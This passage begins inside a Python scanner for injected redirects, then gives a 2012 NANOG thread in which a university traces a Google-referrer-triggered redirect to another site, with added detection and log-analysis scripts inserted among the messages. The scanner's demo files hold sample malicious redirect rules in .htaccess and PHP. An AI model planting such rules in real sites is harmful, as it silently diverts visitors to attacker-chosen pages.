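        "RewriteCond %{HTTP_REFERER} google\\. [NC]\n"
        "RewriteRule ^.*$ http://redirect-target.example/media.php [R=301,L]\n"
    ),
    "includes/footer.php": (
        "<?php\n"
        "if (strpos($_SERVER['HTTP_REFERER'], 'google') !== false) {\n"
        "  header('Location: http://redirect-target.example/media.php');\n"
        "}\n"
    ),
    "index.php": "<?php echo 'hello'; ?>\n",
}


def build_demo_tree(root):
    for rel, content in DEMO_FILES.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)


def run_demo():
    """Build the constructed tree in a temp dir and return scan_tree() over it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in run_demo().items():
        for rule, lineno, line in hits:
            print(f"{rel}:{lineno}: [{rule}] {line}")
```

Run against a real docroot with `scan_tree("/path/to/htdocs")`. The root .htaccess in the demo is deliberately clean, so the only findings are the planted subdirectory file and the PHP include: that is the point, since a review limited to the top-level files would report nothing.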


RE: DNS poisoning at Google?

2012-06-26 Thread David Hubbard
Well as Jeremy pointed out, your site is issuing
redirects, he gave you the command to show it:

curl -e 'http://google.com' csulb.edu

So if you're sure your server(s) haven't been hacked,
your application appears to have been hacked.  It only
issues the redirect if the visitor comes in from a
google search.




> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
> Sent: Wednesday, June 27, 2012 1:03 AM
> To: Michael J Wise
> Cc: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
> 
> Q:have you consulted the logs?
> 
> Seriously? Our servers have multiple log files due to 
> multiple virtual hosts. Our primary domain log file on just 
> one server has over 600,000 records x 3 servers.
> 
> Probably over 100,000 304 redirects in our logs.
> 
> couchtarts.com does not appear in our log files.
> 
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: Michael J Wise [mailto:mjw...@kapu.net] 
> Sent: Tuesday, June 26, 2012 9:56 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> 
> On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:
> 
> > Yes, we've used the Google Webmaster Tools a lot today. 
> Submitted multiple requests and they keep insisting that our 
> site issues a redirect. Unable to duplicate the problem here.
> 
> ... have you consulted the logs?
> If the redirect is there, it ... 1) might not be from the 
> home page, and 2) could be in ... user content?
> 
> awk '{if ($9 ~ /304/) { print $0 }}' access_log.
> ... or some such.
> Granted, might be a storm of " " -> index.html redirects, but 
> they should be grep -v 'able in short order.
> You might also look for the rDNS of the Google spider to see 
> exactly where it is looking, and what it sees.
> 
> Aloha,
> Michael.
> -- 
> "Please have your Internet License 
>  and Usenet Registration handy..."
> 



RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
I'm not familiar with curl and don't understand what I type and what are 
results. Are you suggesting that when google refers to our website, we pick 
that up and redirect to couchtarts?

matthew black
information technology services
california state university, long beach




-Original Message-
From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
Sent: Tuesday, June 26, 2012 9:59 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as 
>> containing malware. They claim our home page returns no results, but 
>> redirects users to another compromised website 
>> couchtarts.com.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files 
>> and are not redirecting to the problem target site. No recent changes 
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and 
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been 
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach 
>> www.csulb.edu






Re: DNS poisoning at Google?

2012-06-26 Thread Jeff Fisher

On 06/26/2012 11:05 PM, Matthew Black wrote:

Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.


Except it is redirecting as shown by Jeremy:

[guppy@mrlaptop ~]$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

That looks like a redirect to me.

Jeff



RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Google Webtools reports a problem with our HOMEPAGE "/". That page is not 
redirecting anywhere.
They also report problems with some 48 other primary sites, none of which 
redirect to the offending couchtarts.

matthew black
information technology services
california state university, long beach





-Original Message-
From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com] 
Sent: Tuesday, June 26, 2012 9:58 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?

It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:24 PM, Matthew Black wrote:

> Running Apache on three Solaris webservers behind a load balancer. No MS 
> Windows!
> 
> Not sure how malicious software could get between our load balancer and Unix 
> servers. Thanks for the tip!
> 
> matthew black
> information technology services
> california state university, long beach
> 
> 
> 
> From: Landon Stewart [mailto:lstew...@superb.net]
> Sent: Tuesday, June 26, 2012 9:07 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Is it possible that some malicious software is listening and injecting a 
> redirect on the wire?  We've seen this before with a Windows machine being 
> infected.
> On 26 June 2012 20:53, Matthew Black wrote:
> Google Safe Browsing and Firefox have marked our website as containing 
> malware. They claim our home page returns no results, but redirects users to 
> another compromised website couchtarts.com.
> 
> We have thoroughly examined our root .htaccess and httpd.conf files and are 
> not redirecting to the problem target site. No recent changes either.
> 
> We ran some NSLOOKUPs against various public DNS servers and intermittently 
> get results that are NOT our servers.
> 
> We believe the DNS servers used by Google's crawler have been poisoned.
> 
> Can anyone shed some light on this?
> 
> matthew black
> information technology services
> california state university, long beach 
> www.csulb.edu
> 
> 
> --
> Landon Stewart <lstew...@superb.net>
> Sr. Administrator
> Systems Engineering
> Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead 
> of the Rest": 
> http://www.superbhosting.net






RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Q:have you consulted the logs?

Seriously? Our servers have multiple log files due to multiple virtual hosts. 
Our primary domain log file on just one server has over 600,000 records x 3 
servers.

Probably over 100,000 304 redirects in our logs.

couchtarts.com does not appear in our log files.


matthew black
information technology services
california state university, long beach

-Original Message-
From: Michael J Wise [mailto:mjw...@kapu.net] 
Sent: Tuesday, June 26, 2012 9:56 PM
To: Matthew Black
Cc: nanog@nanog.org
Subject: Re: DNS poisoning at Google?


On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

... have you consulted the logs?
If the redirect is there, it ... 1) might not be from the home page, and 2) 
could be in ... user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
... or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."






Re: DNS poisoning at Google?

2012-06-26 Thread Jeremy Hanmer
It's not DNS.  If you're sure there's no htaccess files in place, check your 
content (even that stored in a database) for anything that might be altering 
data based on referrer.  This simple test shows what I mean:

Airy:~ user$ curl -e 'http://google.com' csulb.edu
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>

Running curl without the -e argument gives the proper site contents.  

On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> From: Ishmael Rufus [mailto:sakam...@gmail.com]
> Sent: Tuesday, June 26, 2012 9:34 PM
> To: Matthew Black
> Cc: David Hubbard; nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
> 
> Have you tried using Google Webmaster tools?
> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black wrote:
> Running Apache on three Solaris servers behind a load balancer.
> 
> I forgot how to lookup our AS number to see if it matches couchtarts.
> 
> matthew black
> information technology services
> california state university, long beach
> 
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
> 
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu
> 
> For example, the couchtarts site they claim yours is redirecting to:
> 
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com
> 
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
> 
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
> 
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
> 
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
> 
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
> 
> David
> 
> 
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org
>> Subject: DNS poisoning at Google?
>> 
>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects
>> users to another compromised website couchtarts.com.
>> 
>> We have thoroughly examined our root .htaccess and httpd.conf files
>> and are not redirecting to the problem target site. No recent changes
>> either.
>> 
>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> 
>> We believe the DNS servers used by Google's crawler have been
>> poisoned.
>> 
>> Can anyone shed some light on this?
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> www.csulb.edu
>> 
>> 
>> 
> 
> 
> 
> 
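Jeremy's `curl -e` test and David's Googlebot user-agent wget (quoted above) probe the same thing from two directions: whether the server answers differently depending on who appears to be asking. The script below is an added example, not code from this thread or from any of the posters. It fetches one URL under several header variants and reports every variant whose status code or Location target differs from a plain request, which is the check that catches a referrer- or crawler-keyed redirect even when the request you make from your own desk looks clean. The small HTTP server at the bottom is a constructed stand-in for a site with a referrer-triggered redirect, and `redirect-target.example` is a placeholder hostname, so the whole thing runs offline; the Googlebot user-agent string is the one David quoted.

```python
"""Detect referrer- or user-agent-conditional redirects ("cloaking").

Added example, not code from the NANOG thread.  One URL is fetched under
several header variants and every variant whose (status, Location) differs
from the plain request is reported.  The HTTP server below is a constructed
stand-in for a compromised site; the hostname it redirects to is a placeholder.
"""
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Header variants to compare.  A site that is not cloaking answers them all alike.
VARIANTS = {
    "plain": {},
    "referer-google": {"Referer": "http://google.com/"},
    "ua-googlebot": {"User-Agent": GOOGLEBOT_UA},
    "referer-google+ua-googlebot": {"Referer": "http://google.com/", "User-Agent": GOOGLEBOT_UA},
}


def fetch(host, port, path, headers, timeout=5):
    """Return (status, Location) for one GET; the body is read and discarded."""
    conn = HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", path, headers=headers)
        resp = conn.getresponse()
        resp.read()
        return resp.status, resp.getheader("Location")
    finally:
        conn.close()


def probe(host, port, path="/"):
    """Fetch `path` once per variant and map variant name -> (status, Location)."""
    return {name: fetch(host, port, path, hdrs) for name, hdrs in VARIANTS.items()}


def find_cloaking(results, baseline="plain"):
    """Variants whose (status, Location) differ from the baseline request."""
    base = results[baseline]
    return {name: r for name, r in results.items() if name != baseline and r != base}


# --- constructed stand-in for a site with a referrer-triggered redirect ----
PLACEHOLDER_TARGET = "http://redirect-target.example/media.php"  # placeholder hostname


class ReferrerCloakHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if "google." in self.headers.get("Referer", ""):
            # Only visitors arriving from a Google result get the redirect.
            self.send_response(301)
            self.send_header("Location", PLACEHOLDER_TARGET)
            self.end_headers()
            return
        body = b"<html><body>normal page</body></html>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # silence per-request logging in the demo
        pass


def run_demo():
    """Start the stand-in on an ephemeral loopback port, probe it, return the report."""
    server = HTTPServer(("127.0.0.1", 0), ReferrerCloakHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        return find_cloaking(probe("127.0.0.1", server.server_address[1]))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    for variant, (status, location) in run_demo().items():
        print(f"{variant}: {status} -> {location}")
```

Against a real host you would call `probe("www.example.edu", 80)` and feed the result to `find_cloaking`. The stand-in keys on the Referer only, so in the demo both variants that carry a Google referrer come back as 301s while the Googlebot user-agent alone does not; a real compromise may key on either header, which is why the probe sends both separately and together.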




Re: DNS poisoning at Google?

2012-06-26 Thread Michael J Wise

On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:

> Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
> requests and they keep insisting that our site issues a redirect. Unable to 
> duplicate the problem here.

… have you consulted the logs?
If the redirect is there, it … 1) might not be from the home page, and 2) could 
be in … user content?

awk '{if ($9 ~ /304/) { print $0 }}' access_log.
… or some such.
Granted, might be a storm of " " -> index.html redirects, but they should be 
grep -v 'able in short order.
You might also look for the rDNS of the Google spider to see exactly where it 
is looking, and what it sees.

Aloha,
Michael.
-- 
"Please have your Internet License 
 and Usenet Registration handy..."
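Michael's awk one-liner filters the access log on its status column, and his two follow-ups (the storm of cache revalidations, and checking the rDNS of the spider) are exactly what a log review on a case like this runs into. The script below is an added example, not code from this thread or from any of the posters. It parses Apache combined-format lines, keeps only the redirect statuses (301/302/303/307/308) rather than 304, which is "Not Modified" (a conditional-GET revalidation, the noise he mentions), groups the redirects by referring host and client class, and then verifies each source that claims to be Googlebot with the reverse-then-forward DNS check Google documents. The log lines, addresses (documentation ranges) and resolver tables are constructed; the resolvers are injectable so the demo runs offline.

```python
"""Pull real redirects out of an Apache access log and attribute them.

Added example, not code from the NANOG thread.  Parses the combined log
format, keeps redirect statuses (not 304), summarises them by referring host
and client class, and verifies claimed Googlebot sources by rDNS plus forward
lookup.  Log lines, IPs and resolver tables below are constructed.
"""
import re
import socket
from collections import Counter
from urllib.parse import urlparse

# Apache "combined": %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REDIRECT_STATUSES = {301, 302, 303, 307, 308}  # 304 is Not Modified, deliberately excluded

# Constructed sample log (documentation IP ranges, invented timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [26/Jun/2012:21:14:02 -0700] "GET / HTTP/1.1" 301 232 "http://www.google.com/search?q=site" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [26/Jun/2012:21:14:05 -0700] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"
198.51.100.7 - - [26/Jun/2012:21:14:09 -0700] "GET /style.css HTTP/1.1" 304 - "http://www.example.edu/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"
203.0.113.9 - - [26/Jun/2012:21:15:00 -0700] "GET / HTTP/1.1" 301 232 "http://www.google.com/" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.51.100.7 - - [26/Jun/2012:21:15:30 -0700] "GET /about HTTP/1.1" 302 0 "http://www.google.com/search?q=x" "Mozilla/5.0 (X11; Linux x86_64) Firefox/13.0"
""".splitlines()


def parse_combined(line):
    """Dict of fields for one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    parts = entry["req"].split()
    entry["path"] = parts[1] if len(parts) >= 2 else entry["req"]
    return entry


def redirects(lines):
    for line in lines:
        e = parse_combined(line)
        if e and e["status"] in REDIRECT_STATUSES:
            yield e


def referer_host(ref):
    if not ref or ref == "-":
        return "-"
    return urlparse(ref).hostname or "-"


def client_class(ua):
    return "googlebot-ua" if "Googlebot" in ua else "other"


def summarize(lines):
    """Counter keyed by (status, path, referring host, client class)."""
    counts = Counter()
    for e in redirects(lines):
        counts[(e["status"], e["path"], referer_host(e["referer"]), client_class(e["ua"]))] += 1
    return counts


def verify_googlebot(ip, reverse=socket.gethostbyaddr, forward=socket.gethostbyname):
    """A User-Agent is free to forge; an rDNS name under googlebot.com/google.com
    that resolves forward to the same address is the check Google documents."""
    try:
        name = reverse(ip)[0]
        if not name.endswith((".googlebot.com", ".google.com")):
            return False
        return forward(name) == ip
    except OSError:
        return False


# Constructed resolver tables standing in for real DNS during the demo.
DEMO_PTR = {"192.0.2.10": "crawl-192-0-2-10.googlebot.com", "203.0.113.9": "host-9.example-colo.invalid"}
DEMO_A = {"crawl-192-0-2-10.googlebot.com": "192.0.2.10", "host-9.example-colo.invalid": "203.0.113.9"}


def demo_reverse(ip):
    if ip not in DEMO_PTR:
        raise socket.herror(1, "Unknown host")
    return DEMO_PTR[ip], [], [ip]


def demo_forward(name):
    if name not in DEMO_A:
        raise socket.gaierror(-2, "Name or service not known")
    return DEMO_A[name]


def report(lines=SAMPLE_LOG, reverse=demo_reverse, forward=demo_forward):
    """Redirect summary plus, per source IP claiming Googlebot, whether it verifies."""
    summary = summarize(lines)
    claimed = {e["ip"] for e in redirects(lines) if client_class(e["ua"]) == "googlebot-ua"}
    verified = {ip: verify_googlebot(ip, reverse, forward) for ip in sorted(claimed)}
    return summary, verified


if __name__ == "__main__":
    summary, verified = report()
    for key, n in summary.most_common():
        print(n, key)
    for ip, ok in verified.items():
        print(ip, "verified Googlebot" if ok else "claims Googlebot, does NOT verify")
```

For a real log, pass `open("access_log")` as `lines` and drop the resolver arguments so the system resolver is used. Two redirects in the sample come from requests that arrive with a Google referrer and a Googlebot user-agent; only one of the two source addresses survives the rDNS check, which is the kind of thing the raw UA column cannot tell you.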




RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Yes, we’ve used the Google Webmaster Tools a lot today. Submitted multiple 
requests and they keep insisting that our site issues a redirect. Unable to 
duplicate the problem here.

matthew black
information technology services
california state university, long beach

From: Ishmael Rufus [mailto:sakam...@gmail.com]
Sent: Tuesday, June 26, 2012 9:34 PM
To: Matthew Black
Cc: David Hubbard; nanog@nanog.org
Subject: Re: DNS poisoning at Google?

Have you tried using Google Webmaster tools?
On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black wrote:
Running Apache on three Solaris servers behind a load balancer.

I forgot how to lookup our AS number to see if it matches couchtarts.

matthew black
information technology services
california state university, long beach

-Original Message-
From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
Sent: Tuesday, June 26, 2012 9:14 PM
To: nanog@nanog.org
Subject: RE: DNS poisoning at Google?

Typically if google were pulling your site sometimes from the wrong IP, their 
safe browsing page should indicate it being on another AS number in addition to 
the correct one 2152:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu

For example, the couchtarts site they claim yours is redirecting to:

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com

That site's DNS is screwed up and some requests are sent to a different IP at a 
different host, so Google picked up both AS numbers.

Could one of your domain's subdomains be what is actually infected?  You seem 
to have a bunch of them, maybe google is penalizing the whole domain over a 
subdomain?  Not sure if they do that or not.

If your sites are running off of an application like wordpress, etc., you may 
not get the same page that google gets and the application may have been hacked.
Here's a wget command you can use to make requests to your site pretending to 
be google:

wget -c \
--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
--output-document=googlebot.html 'http://www.csulb.edu'

nanog will probably line wrap that user agent line making it not correct so 
you'll have to put it back together correctly.  It will save the output to a 
file named googlebot.html you can look at to see if anything weird ends up 
being served.

David


> -Original Message-
> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> Sent: Tuesday, June 26, 2012 11:53 PM
> To: nanog@nanog.org
> Subject: DNS poisoning at Google?
>
> Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects
> users to another compromised website couchtarts.com.
>
> We have thoroughly examined our root .htaccess and httpd.conf files
> and are not redirecting to the problem target site. No recent changes
> either.
>
> We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
>
> We believe the DNS servers used by Google's crawler have been
> poisoned.
>
> Can anyone shed some light on this?
>
> matthew black
> information technology services
> california state university, long beach
> www.csulb.edu






Re: DNS poisoning at Google?

2012-06-26 Thread Sadiq Saif
couchtarts.com seems to be hosted on an IP belonging to AS32244 (Liquid Web).

On Wed, Jun 27, 2012 at 12:28 AM, Matthew Black wrote:
> Running Apache on three Solaris servers behind a load balancer.
>
> I forgot how to lookup our AS number to see if it matches couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
>
> Typically if google were pulling your site sometimes from the wrong IP, their 
> safe browsing page should indicate it being on another AS number in addition 
> to the correct one 2152:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu
>
> For example, the couchtarts site they claim yours is redirecting to:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com
>
> That site's DNS is screwed up and some requests are sent to a different IP at 
> a different host, so Google picked up both AS numbers.
>
> Could one of your domain's subdomains be what is actually infected?  You seem 
> to have a bunch of them, maybe google is penalizing the whole domain over a 
> subdomain?  Not sure if they do that or not.
>
> If your sites are running off of an application like wordpress, etc., you may 
> not get the same page that google gets and the application may have been 
> hacked.
> Here's a wget command you can use to make requests to your site pretending to 
> be google:
>
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
>
> nanog will probably line wrap that user agent line making it not correct so 
> you'll have to put it back together correctly.  It will save the output to a 
> file named googlebot.html you can look at to see if anything weird ends up 
> being served.
>
> David
>
>
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu]
>> Sent: Tuesday, June 26, 2012 11:53 PM
>> To: nanog@nanog.org
>> Subject: DNS poisoning at Google?
>>
>> Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects
>> users to another compromised website couchtarts.com.
>>
>> We have thoroughly examined our root .htaccess and httpd.conf files
>> and are not redirecting to the problem target site. No recent changes
>> either.
>>
>> We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>>
>> We believe the DNS servers used by Google's crawler have been
>> poisoned.
>>
>> Can anyone shed some light on this?
>>
>> matthew black
>> information technology services
>> california state university, long beach
>> www.csulb.edu



-- 
Sadiq S
O< ascii ribbon campaign - stop html mail - www.asciiribbon.org



Re: DNS poisoning at Google?

2012-06-26 Thread Ishmael Rufus
Have you tried using Google Webmaster tools?

On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black wrote:

> Running Apache on three Solaris servers behind a load balancer.
>
> I forgot how to lookup our AS number to see if it matches couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
> -Original Message-
> From: David Hubbard [mailto:dhubb...@dino.hostasaurus.com]
> Sent: Tuesday, June 26, 2012 9:14 PM
> To: nanog@nanog.org
> Subject: RE: DNS poisoning at Google?
>
> Typically if google were pulling your site sometimes from the wrong IP,
> their safe browsing page should indicate it being on another AS number in
> addition to the correct one 2152:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.csulb.edu
>
> For example, the couchtarts site they claim yours is redirecting to:
>
> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http://www.couchtarts.com
>
> That site's DNS is screwed up and some requests are sent to a different IP
> at a different host, so Google picked up both AS numbers.
>
> Could one of your domain's subdomains be what is actually infected?  You
> seem to have a bunch of them, maybe google is penalizing the whole domain
> over a subdomain?  Not sure if they do that or not.
>
> If your sites are running off of an application like wordpress, etc., you
> may not get the same page that google gets and the application may have
> been hacked.
> Here's a wget command you can use to make requests to your site pretending
> to be google:
>
> wget -c \
> --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" \
> --output-document=googlebot.html 'http://www.csulb.edu'
>
> nanog will probably line wrap that user agent line making it not correct
> so you'll have to put it back together correctly.  It will save the output
> to a file named googlebot.html you can look at to see if anything weird
> ends up being served.
>
> David
>
>
> > -Original Message-
> > From: Matthew Black [mailto:matthew.bl...@csulb.edu]
> > Sent: Tuesday, June 26, 2012 11:53 PM
> > To: nanog@nanog.org
> > Subject: DNS poisoning at Google?
> >
> > Google Safe Browsing and Firefox have marked our website as containing
> > malware. They claim our home page returns no results, but redirects
> > users to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files
> > and are not redirecting to the problem target site. No recent changes
> > either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> > intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been
> > poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu


RE: DNS poisoning at Google?

